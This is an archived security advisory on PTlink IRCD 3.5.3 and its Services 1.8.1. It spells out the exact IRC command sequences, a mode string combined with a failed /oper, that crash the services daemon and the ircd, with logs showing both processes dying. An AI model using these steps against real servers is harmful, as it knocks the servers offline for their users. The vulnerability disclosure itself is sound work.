[ SOURCE: http://www.secureroot.com/security/advisories/9755055547.html ] PTlink3.5.3 IRCD + PTlink.Services1.8.1 Advisory by wildcoyote [lms@ispgaya.pt] Hi! I'm wildcoyote and i recently found a bug on the PTlink IRCD [3.5.3] + it's services [1.8.1]. It is possible to kill the ircd and it's services... To do so, you must: [Crash Services] - Connect to the irc server... Then, do the following: Issue a /mode +owgscfxeb and a /oper command! This will cause the server to: /mode +owgscfxeb [23:25] *** whocares sets mode: +wgsx /oper - Password Incorrect - [23:25] -freddy.userfriendly- Your attempt has been logged. - [23:26] -freddy.userfriendly- *** Notice -- Connection to services.freddy.userfriendly[*@192.168.0.3] activated. - [23:26] -freddy.userfriendly- *** Notice -- Lost connection to services.freddy.userfriendly[192.168.0.3]:Broken pipe - [root@freddy wildcoyote]# ps aux | grep services [root@freddy wildcoyote]# [Crash ircD] - Connect to the irc server... Then, do the following: Issue a /oper and a /mode +owgscfxeb command! This will cause the server to: [23:43] -NickServ- This nickname is registered and protected. If it is your - [23:43] -NickServ- nick, type /NickServ IDENTIFY password. Otherwise, - [23:43] -NickServ- please choose a different nick. - [23:43] -NickServ- If you do not change within one minute, your nick will be changed. /oper wildcoyote whocares - Password Incorrect - [23:43] -freddy.userfriendly- Your attempt has been logged. /mode mynick +owgscfxeb - [23:44] *** Disconnected [root@freddy wildcoyote]# ps aux | grep ircd [root@freddy wildcoyote]# And..that's it for today kids :] Regardz, Luis Miguel Silva aka wildcoyote aka wC http://www.unsecurity.org/ Member http://www.lonoss.org/ Member http://www.ispgaya.pt/ Student